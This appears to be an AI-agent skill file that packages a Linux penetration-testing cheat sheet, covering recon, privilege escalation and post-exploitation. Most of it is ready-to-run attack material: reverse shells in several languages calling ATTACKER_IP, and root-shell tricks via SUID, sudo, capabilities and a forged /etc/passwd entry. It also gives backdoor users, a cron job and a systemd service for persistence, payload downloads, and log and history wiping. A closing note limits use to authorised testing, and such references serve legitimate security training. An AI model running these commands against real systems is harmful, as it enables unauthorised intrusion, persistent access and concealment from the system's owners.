Practical Linux command reference for penetration testing including reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation techniques
---
name: linux-pentester-commands
description: Practical Linux command reference and techniques for penetration testing and security assessments
triggers:
- "help me with linux pentesting commands"
- "how do I enumerate services on linux"
- "show me privilege escalation techniques"
- "what are common recon commands for pentesting"
- "help with linux post exploitation"
- "how to find SUID binaries"
- "show pentesting cheatsheet for linux"
- "linux enumeration during a pentest"
---
# Linux Pentester Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
This skill provides practical Linux command knowledge for penetration testing, based on the HIMANSHUSHARMA20/Linux-for-a-Pentester repository. It covers reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation techniques with real-world commands used in CTFs and security assessments.
## What This Project Provides
A curated collection of Linux commands organized by penetration testing phases:
- **00-General-Commands**: Essential Linux survival commands
- **01-Recon**: Local and network reconnaissance
- **02-Enumeration**: Service and user enumeration
- **03-Exploitation**: Initial access techniques
- **04-Privilege-Escalation**: Methods to escalate to root
- **05-Post-Exploitation**: Persistence and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation
Clone the repository for offline reference:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
For quick access during engagements:
```bash
# Bookmark or alias the repo location
echo "alias pentester-notes='cd ~/Linux-for-a-Pentester'" >> ~/.bashrc
source ~/.bashrc
```
## General Commands (Survival Kit)
### File System Navigation
```bash
# Find writable directories
find / -writable -type d 2>/dev/null
# Find files by name
find / -name "*.conf" 2>/dev/null
# Search for SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Search for SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Find files modified in last N minutes
find /var/log -mmin -10 2>/dev/null
```
### Text Processing
```bash
# Search recursively for strings
grep -r "password" /home 2>/dev/null
# Extract specific columns
cat users.txt | cut -d: -f1,3
# Sort and count unique occurrences
cat access.log | sort | uniq -c | sort -rn
# Decode base64
echo "dXNlcjpwYXNzd29yZA==" | base64 -d
```
## Reconnaissance Phase
### System Information
```bash
# OS and kernel version
uname -a
cat /etc/os-release
cat /proc/version
# CPU architecture
lscpu
# Disk information
df -h
lsblk
# Memory info
free -h
cat /proc/meminfo
```
### Network Reconnaissance
```bash
# List network interfaces
ip a
ifconfig
# Show routing table
ip route
route -n
# Active network connections
ss -tulpn
netstat -tulpn
# ARP cache
ip neigh
arp -a
# Check for network services
ps aux | grep -E 'apache|nginx|mysql|ssh'
```
### User and Group Enumeration
```bash
# Current user context
id
whoami
# List all users
cat /etc/passwd
# Users with login shells
cat /etc/passwd | grep -v nologin
# Group memberships
cat /etc/group
# Recently logged in users
last -a
who
w
# Command history
history
cat ~/.bash_history
```
## Service Enumeration
### Port Scanning (when tools unavailable)
```bash
# Bash TCP port scanner
for port in {1..1000}; do
timeout 1 bash -c "echo >/dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port is open"
done
# Check specific port
(echo >/dev/tcp/10.10.10.1/80) &>/dev/null && echo "Port 80 open" || echo "Port 80 closed"
```
### Service Version Detection
```bash
# Apache/Nginx version
apache2 -v
nginx -v
curl -I http://localhost
# MySQL version
mysql --version
mysql -V
# SSH version
ssh -V
cat /etc/ssh/sshd_config | grep -i version
# PHP version
php -v
```
### Database Enumeration
```bash
# MySQL enumeration
mysql -u root -p
SHOW DATABASES;
USE database_name;
SHOW TABLES;
SELECT * FROM users;
# PostgreSQL
psql -U postgres
\l # List databases
\c database_name # Connect to database
\dt # List tables
```
## Privilege Escalation Techniques
### SUID/SGID Exploitation
```bash
# Find SUID binaries
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# Common exploitable SUID binaries
find / -name "nmap" -o -name "vim" -o -name "find" -o -name "python*" 2>/dev/null
# Exploit find SUID
find . -exec /bin/bash -p \; -quit
# Exploit vim SUID
vim -c ':!/bin/bash' -c ':q'
# GTFOBins reference for SUID exploitation
# https://gtfobins.github.io/
```
### Sudo Exploitation
```bash
# Check sudo privileges
sudo -l
# Common sudo misconfigurations
# If (ALL:ALL) ALL or NOPASSWD:
sudo su
sudo bash
sudo /bin/sh
# Sudo vim exploit
sudo vim -c ':!/bin/bash'
# Sudo find exploit
sudo find . -exec /bin/bash \; -quit
# Sudo less/more exploit
sudo less /etc/profile
!/bin/bash
```
### Cron Job Exploitation
```bash
# List cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
# Check for writable cron scripts
find /etc/cron* -type f -writable 2>/dev/null
# Monitor cron execution
watch -n 1 'ps aux | grep cron'
# Exploit writable cron script
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/script.sh
```
### Kernel Exploits
```bash
# Check kernel version
uname -a
cat /proc/version
# Common kernel exploits to research
# - DirtyCOW (CVE-2016-5195): Linux Kernel 2.6.22 < 3.9
# - Overlayfs (CVE-2021-3493): Ubuntu kernels
# - PwnKit (CVE-2021-4034): pkexec
# Search for kernel exploits
searchsploit kernel $(uname -r | cut -d'-' -f1)
```
### Writable /etc/passwd
```bash
# Check if writable
ls -la /etc/passwd
# Generate password hash
openssl passwd -1 -salt salt password123
# Add root user
echo 'newroot:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0:root:/root:/bin/bash' >> /etc/passwd
# Switch to new user
su newroot
```
### Capabilities Exploitation
```bash
# List file capabilities
getcap -r / 2>/dev/null
# Python cap_setuid exploitation
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl cap_setuid
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```
## Exploitation Techniques
### Reverse Shells
```bash
# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Netcat reverse shell
nc -e /bin/bash ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP reverse shell
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Perl reverse shell
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### Shell Stabilization
```bash
# Python PTY upgrade
python -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z
stty raw -echo; fg
export TERM=xterm
# Script command
script /dev/null -c bash
# Socat (if available)
# On attacker: socat file:`tty`,raw,echo=0 tcp-listen:4444
# On victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
```
## Post-Exploitation
### Persistence Mechanisms
```bash
# Add SSH key
mkdir -p ~/.ssh
echo "ssh-rsa YOUR_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Create backdoor user
useradd -m -s /bin/bash backdoor
echo "backdoor:password123" | chpasswd
usermod -aG sudo backdoor
# Cron job persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" | crontab -
# Service persistence
cat > /etc/systemd/system/backdoor.service <<EOF
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
```
### Data Exfiltration
```bash
# Find sensitive files
find / -name "*.db" -o -name "*.sql" -o -name "*.conf" 2>/dev/null
find /home -name "*.txt" -o -name "*.pdf" 2>/dev/null
# Search for passwords
grep -ri "password" /var/www/html 2>/dev/null
grep -ri "passw" /home 2>/dev/null
# Database credentials
cat /var/www/html/config.php
cat /etc/mysql/my.cnf
# Archive and exfiltrate
tar czf /tmp/data.tar.gz /var/www/html
# Transfer via nc, scp, curl, etc.
```
### Covering Tracks
```bash
# Clear command history
history -c
echo "" > ~/.bash_history
# Clear logs
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
# Remove created files
find /tmp -user $(whoami) -delete
find /var/tmp -user $(whoami) -delete
```
## Common Patterns and Workflows
### Quick Enumeration Script
```bash
#!/bin/bash
echo "[*] System Information"
uname -a
echo "[*] User Information"
id
whoami
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null | head -20
echo "[*] Sudo Privileges"
sudo -l 2>/dev/null
echo "[*] Cron Jobs"
cat /etc/crontab 2>/dev/null
echo "[*] Writable Directories in PATH"
echo $PATH | tr ':' '\n' | xargs -I {} find {} -writable 2>/dev/null
```
### File Transfer Methods
```bash
# Using wget
wget http://ATTACKER_IP/file -O /tmp/file
# Using curl
curl http://ATTACKER_IP/file -o /tmp/file
# Using netcat
# Attacker: nc -lvnp 4444 < file
# Victim: nc ATTACKER_IP 4444 > file
# Using base64
# Attacker: cat file | base64
# Victim: echo "BASE64_STRING" | base64 -d > file
# Using Python HTTP server
# Attacker: python3 -m http.server 8000
# Victim: wget http://ATTACKER_IP:8000/file
```
## Troubleshooting
### Command Not Found
```bash
# Check if binary exists
which command_name
find / -name "command_name" 2>/dev/null
# Use absolute paths
/usr/bin/python3 instead of python3
# Check PATH variable
echo $PATH
# Common binary locations
ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin
```
### Permission Denied Errors
```bash
# Check file permissions
ls -la file_name
# Check current user context
id
groups
# Use sudo if available
sudo command_name
# Check file capabilities
getcap file_name
```
### Network Connectivity Issues
```bash
# Check if target is reachable
ping -c 4 TARGET_IP
# Check firewall rules
iptables -L -n
cat /etc/iptables/rules.v4
# Test specific port
nc -zv TARGET_IP PORT
timeout 2 bash -c "echo >/dev/tcp/TARGET_IP/PORT" && echo "Open"
```
### Shell Instability
```bash
# Upgrade shell to fully interactive
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 38 columns 116 # Adjust to your terminal size
# If Python not available, try
script /dev/null -qc /bin/bash
```
## Security and Legal Considerations
**WARNING**: These commands and techniques should ONLY be used:
- On systems you own
- With explicit written permission
- In authorized penetration testing engagements
- In isolated lab environments (HTB, TryHackMe, etc.)
Unauthorized access to computer systems is illegal in most jurisdictions.
## Additional Resources
- GTFOBins: https://gtfobins.github.io/
- PEASS-ng (LinPEAS): Automated privilege escalation enumeration
- Linux Smart Enumeration (LSE): Quick enumeration script
- PayloadsAllTheThings: Comprehensive payload repository
Creator's repository · aradotso/security-skills